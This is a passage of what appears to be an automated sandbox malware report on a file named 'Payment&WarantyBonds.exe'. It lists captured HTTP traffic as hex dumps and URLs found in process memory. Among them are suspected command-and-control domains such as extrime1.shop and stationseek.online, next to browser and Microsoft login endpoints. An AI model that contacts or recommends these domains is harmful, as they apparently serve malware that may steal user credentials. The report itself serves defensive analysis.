74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUHwzHeeaK07BdDXGPgYn90TIdEYVBR1SAV6wEUL1lI8%2BYb6S%2BVcop685tmmlSSj0FiGcF0GeDsMYjQOXsPNOMStMs1TtT0VOgf3VxI7t%2FJTq7zBCJ7t08DLuf1CCQQEWTDnbncWcGWNQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1478&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1Qp0ukKMEeQgs6o%2BwXck7xNYyZcumSwOAJJD84Cj7dF87XdMaCrjGWrYvj9I1MLqY%2FAvcs4d6H8GJZADfCa8Wq5RxkTIsXxXIQqQWFHDY%2FYEnghqv%2FSdyaSNi5bxCMfdQlmsGO%2FzaVmGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YCUGYchLbJXV%2FJMALRkbPKPygHb%2B2S6JqxaAviQJta1hjsQXmpeKvh65zoEcqumyG5DAZ1QD4k6R1bTTlbGapU%2BK%2F72Hk2jcXlwci3puO1qEYR5NiIEcWJcMk%2B13NCbB%2FpjBUbxiv1Hog%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1408&sent=1&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10841&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouUuSoRynzFb31XBRZ2NbLSS0T1agnkjrQ8iKzVwb2%2FXJVMwe4j1yptinmvoxDWI960JcFPZlCnFdzpt%2Fr6jJDHeebcMa07RucPBdwvXO30T3NJu5Jwyf8UPm%2BgwGEeCvp941JjH4M9fGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=1399&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=468&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:44 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: systeminfo.exe, 00000007.00000002.4149067807.000000000628A000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000003B6A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUp
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: oDnyHukDVUZk.exe, 00000008.00000002.4150364860.0000000004AD4000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.extrime1.shop
Source: oDnyHukDVUZk.exe, 00000008.00000002.4150364860.0000000004AD4000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.extrime1.shop/jr4j/
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: systeminfo.exe, 00000007.00000002.4149067807.000000000591E000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000031FE000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.stationseek.online/wd23?ZT=hRp9
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Exo
Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033)
Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: systeminfo.exe, 00000007.00000003.2250291188.000000000789E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://piensasolutions.com/css/parking2.css
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://plus.google.com/u/0/102310483732773374239
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://twitter.com/piensasolutions
Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.0000000005F66000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000003846000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dom
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=host
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign
Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensa
Source: oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002D48000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.strato.de
Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.west.cn/cloudhost/
